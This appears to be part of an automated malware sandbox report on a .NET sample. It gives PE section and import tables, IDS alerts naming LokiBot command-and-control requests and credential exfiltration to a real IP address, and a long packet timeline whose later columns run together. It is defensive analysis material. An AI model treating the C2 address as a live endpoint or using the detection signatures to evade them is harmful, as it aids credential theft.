                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xa737c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa8000          0x3204        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0xa8c00          0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xac000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xa53f4       0xa5400   3a556957711ec72af595ebb21532f82d  False     0.9293373558055976  data       7.958469565640936    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xa8000          0x3204        0x3400    ed07a8a4fcd614debca9a1d7299c7c22  False     0.8815354567307693  data       7.559385490334242    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xac000          0xc           0x200     8375fa9d1f50fda2a9cab47641c55246  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                         Language  Country  ZLIB Complexity
RT_ICON        0xa80c8  0x2d07  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                     0.9655591220612475
RT_GROUP_ICON  0xaade0  0x14    data                                                                             1.05
RT_VERSION     0xaae04  0x3fc   data                                                                             0.42745098039215684
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                 Protocol  SID      Message                                                            Source Port  Dest Port  Source IP    Dest IP
04/26/24-04:57:31.331813  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2              49758        80         192.168.2.4  45.77.223.48
04/26/24-04:57:25.359561  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2              49752        80         192.168.2.4  45.77.223.48
04/26/24-04:57:09.548217  TCP       2024312  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1  49738   80         192.168.2.4  45.77.223.48
04/26/24-04:57:25.359561  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49752        80         192.168.2.4  45.77.223.48
04/26/24-04:57:31.331813  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1              49758        80         192.168.2.4  45.77.223.48
04/26/24-04:57:31.331813  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49758        80         192.168.2.4  45.77.223.48
04/26/24-04:57:21.056286  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2              49746        80         192.168.2.4  45.77.223.48
04/26/24-04:57:23.949613  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49749        80         192.168.2.4  45.77.223.48
04/26/24-04:57:25.359561  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1              49752        80         192.168.2.4  45.77.223.48
04/26/24-04:57:21.056286  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1              49746        80         192.168.2.4  45.77.223.48
04/26/24-04:57:21.056286  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49746        80         192.168.2.4  45.77.223.48
04/26/24-04:57:23.949613  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2              49749        80         192.168.2.4  45.77.223.48
04/26/24-04:57:08.113616  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49737        80         192.168.2.4  45.77.223.48
04/26/24-04:57:08.113616  TCP       2024317  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2  49737   80         192.168.2.4  45.77.223.48
04/26/24-04:57:16.639664  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1              49743        80         192.168.2.4  45.77.223.48
04/26/24-04:57:16.639664  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49743        80         192.168.2.4  45.77.223.48
04/26/24-04:57:16.639664  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2              49743        80         192.168.2.4  45.77.223.48
04/26/24-04:57:29.559162  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49757        80         192.168.2.4  45.77.223.48
04/26/24-04:57:26.717841  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49754        80         192.168.2.4  45.77.223.48
04/26/24-04:57:29.559162  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2              49757        80         192.168.2.4  45.77.223.48
04/26/24-04:57:29.559162  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1              49757        80         192.168.2.4  45.77.223.48
04/26/24-04:57:12.236287  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49742        80         192.168.2.4  45.77.223.48
04/26/24-04:57:19.622306  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49745        80         192.168.2.4  45.77.223.48
04/26/24-04:57:12.236287  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2              49742        80         192.168.2.4  45.77.223.48
04/26/24-04:57:26.717841  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1              49754        80         192.168.2.4  45.77.223.48
04/26/24-04:57:19.622306  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1              49745        80         192.168.2.4  45.77.223.48
04/26/24-04:57:26.717841  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2              49754        80         192.168.2.4  45.77.223.48
04/26/24-04:57:08.113616  TCP       2024312  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1  49737   80         192.168.2.4  45.77.223.48
04/26/24-04:57:19.622306  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2              49745        80         192.168.2.4  45.77.223.48
04/26/24-04:57:12.236287  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1              49742        80         192.168.2.4  45.77.223.48
04/26/24-04:57:28.121110  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1              49756        80         192.168.2.4  45.77.223.48
04/26/24-04:57:10.856048  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2              49741        80         192.168.2.4  45.77.223.48
04/26/24-04:57:23.949613  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1              49749        80         192.168.2.4  45.77.223.48
04/26/24-04:57:18.033252  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2              49744        80         192.168.2.4  45.77.223.48
04/26/24-04:57:22.484753  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49747        80         192.168.2.4  45.77.223.48
04/26/24-04:57:10.856048  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49741        80         192.168.2.4  45.77.223.48
04/26/24-04:57:28.121110  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49756        80         192.168.2.4  45.77.223.48
04/26/24-04:57:10.856048  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1              49741        80         192.168.2.4  45.77.223.48
04/26/24-04:57:18.033252  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1              49744        80         192.168.2.4  45.77.223.48
04/26/24-04:57:22.484753  TCP       2024313  ET TROJAN LokiBot Request for C2 Commands Detected M1              49747        80         192.168.2.4  45.77.223.48
04/26/24-04:57:09.548217  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49738        80         192.168.2.4  45.77.223.48
04/26/24-04:57:28.121110  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2              49756        80         192.168.2.4  45.77.223.48
04/26/24-04:57:09.548217  TCP       2024317  ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2  49738   80         192.168.2.4  45.77.223.48
04/26/24-04:57:22.484753  TCP       2024318  ET TROJAN LokiBot Request for C2 Commands Detected M2              49747        80         192.168.2.4  45.77.223.48
04/26/24-04:57:18.033252  TCP       2021641  ET TROJAN LokiBot User-Agent (Charon/Inferno)                      49744        80         192.168.2.4  45.77.223.48
Timestamp                           Source Port  Dest Port  Source IP     Dest IP
Apr 26, 2024 04:57:07.923290014 CEST  49737        80         192.168.2.4   45.77.223.48
Apr 26, 2024 04:57:08.111411095 CEST  80           49737      45.77.223.48  192.168.2.4
Apr 26, 2024 04:57:08.111506939 CEST  49737        80         192.168.2.4   45.77.223.48
Apr 26, 2024 04:57:08.113615990 CEST  49737        80         192.168.2.4   45.77.223.48
Apr 26, 2024 04:57:08.298657894 CEST  80           49737      45.77.223.48  192.168.2.4
Apr 26, 2024 04:57:08.300956964 CEST  49737        80         192.168.2.4   45.77.223.48
Apr 26, 2024 04:57:08.486089945 CEST  80           49737      45.77.223.48  192.168.2.4
Apr 26, 2024 04:57:09.199505091 CEST  80           49737      45.77.223.48  192.168.2.4
Apr 26, 2024 04:57:09.199570894 CEST  80           49737      45.77.223.48  192.168.2.4
Apr 26, 2024 04:57:09.199605942 CEST  80           49737      45.77.223.48  192.168.2.4
Apr 26, 2024 04:57:09.199619055 CEST  49737        80         192.168.2.4   45.77.223.48
Apr 26, 2024 04:57:09.199660063 CEST  49737        80         192.168.2.4   45.77.223.48
Apr 26, 2024 04:57:09.199660063 CEST  49737        80         192.168.2.4   45.77.223.48
Apr 26, 2024 04:57:09.208127975 CEST  80           49737      45.77.223.48  192.168.2.4
Apr 26, 2024 04:57:09.208230019 CEST  49737        80         192.168.2.4   45.77.223.48
Apr 26, 2024 04:57:09.208436966 CEST  80           49737      45.77.223.48  192.168.2.4
Apr 26, 2024 04:57:09.208486080 CEST  49737        80         192.168.2.4   45.77.223.48
Apr 26, 2024 04:57:09.208544970 CEST  80           49737      45.77.223.48  192.168.2.4
Apr 26, 2024 04:57:09.208606958 CEST  49737        80         192.168.2.4   45.77.223.48
Apr 26, 2024 04:57:09.208736897 CEST  80           49737      45.77.223.48  192.168.2.4
Apr 26, 2024 04:57:09.208790064 CEST  49737        80         192.168.2.4   45.77.223.48
Apr 26, 2024 04:57:09.208884001 CEST  80           49737      45.77.223.48  192.168.2.4
Apr 26, 2024 04:57:09.208923101 CEST  80           49737      45.77.223.48  192.168.2.4
Apr 26, 2024 04:57:09.208925009 CEST  49737        80         192.168.2.4   45.77.223.48
Apr 26, 2024 04:57:09.208965063 CEST  49737        80         192.168.2.4   45.77.223.48
Apr 26, 2024 04:57:09.209387064 CEST  80           49737      45.77.223.48  192.168.2.4
Apr 26, 2024 04:57:09.209435940 CEST  49737        80         192.168.2.4   45.77.223.48
Apr 26, 2024 04:57:09.359895945 CEST  49738        80         192.168.2.4   45.77.223.48
                                              Apr 26, 2024 04:57:09.385356903 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.385416985 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.385420084 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.385526896 CEST804973745.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.385575056 CEST4973780192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.545978069 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.546103001 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.548217058 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.734386921 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:09.736443043 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:09.922961950 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.612135887 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.612238884 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.612258911 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.612287045 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.612293005 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.612355947 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.621912956 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.621972084 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.622256994 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.622311115 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.622353077 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.622391939 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.622523069 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.622662067 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.622710943 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.622710943 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.622757912 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.622801065 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.622806072 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.622838974 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.666614056 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.797975063 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.798130035 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.798132896 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.798177958 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.798229933 CEST804973845.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.798275948 CEST4973880192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.854001045 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:10.854126930 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:10.856048107 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.042500019 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.042620897 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.229470015 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.914695024 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.914824009 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.914849997 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.914946079 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.915000916 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.915123940 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.923022032 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.923074007 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.923624039 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.923701048 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.924005985 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.924051046 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.924097061 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.924233913 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.924268007 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.924268007 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.924304962 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.924349070 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:11.924384117 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:11.924424887 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.046821117 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.101588011 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:12.101649046 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.101721048 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:12.101773977 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.101883888 CEST804974145.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:12.102046013 CEST4974180192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.233901024 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:12.234015942 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.236287117 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.423437119 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:12.423620939 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:12.611402988 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.293761015 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.293822050 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.293935061 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.293935061 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.293987036 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.294023037 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.294042110 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.294135094 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.294197083 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.294250011 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.302445889 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.302510023 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.302654028 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.302719116 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.302778959 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.302838087 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.302870989 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.302926064 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.303112030 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.303174019 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.448174953 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.480768919 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.480848074 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.480866909 CEST804974245.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.480936050 CEST4974280192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.636265039 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.636383057 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.639663935 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:16.828164101 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:16.828258991 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:17.014755011 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:17.695516109 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:17.695570946 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:17.695606947 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:17.695652008 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:17.695652962 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:17.695663929 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:17.695754051 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:17.695754051 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:17.704400063 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:17.704464912 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:17.704700947 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:17.704756021 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:17.704804897 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:17.704859018 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:17.704909086 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:17.704962969 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:17.705291986 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:17.705348015 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:17.705385923 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:17.705434084 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:17.843854904 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:17.883229017 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:17.883285046 CEST804974345.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:17.883327007 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:17.883372068 CEST4974380192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:18.029932022 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:18.030092955 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:18.033252001 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:18.220571041 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:18.220884085 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:18.408260107 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.100035906 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.100183964 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.100338936 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.100435972 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.107551098 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.107640028 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.107820988 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.107876062 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.107978106 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.108031034 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.108160019 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.108222008 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.108257055 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.108298063 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.108316898 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.108347893 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.108381033 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.108422041 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.108431101 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.108576059 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.286609888 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.286674023 CEST804974445.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.286686897 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.286761999 CEST4974480192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.432156086 CEST4974580192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.620418072 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.620548964 CEST4974580192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.622306108 CEST4974580192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.809357882 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:19.809474945 CEST4974580192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:19.996522903 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.685904026 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.686014891 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.686095953 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.686105013 CEST4974580192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:20.693898916 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.693964958 CEST4974580192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:20.694194078 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.694323063 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.694375992 CEST4974580192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:20.694431067 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.694722891 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.694788933 CEST4974580192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:20.694843054 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.694936037 CEST804974545.77.223.48192.168.2.4
                                              Apr 26, 2024 04:57:20.694986105 CEST4974580192.168.2.445.77.223.48
                                              Apr 26, 2024 04:57:20.714508057 CEST4974580192.168.2.445.77.223.48
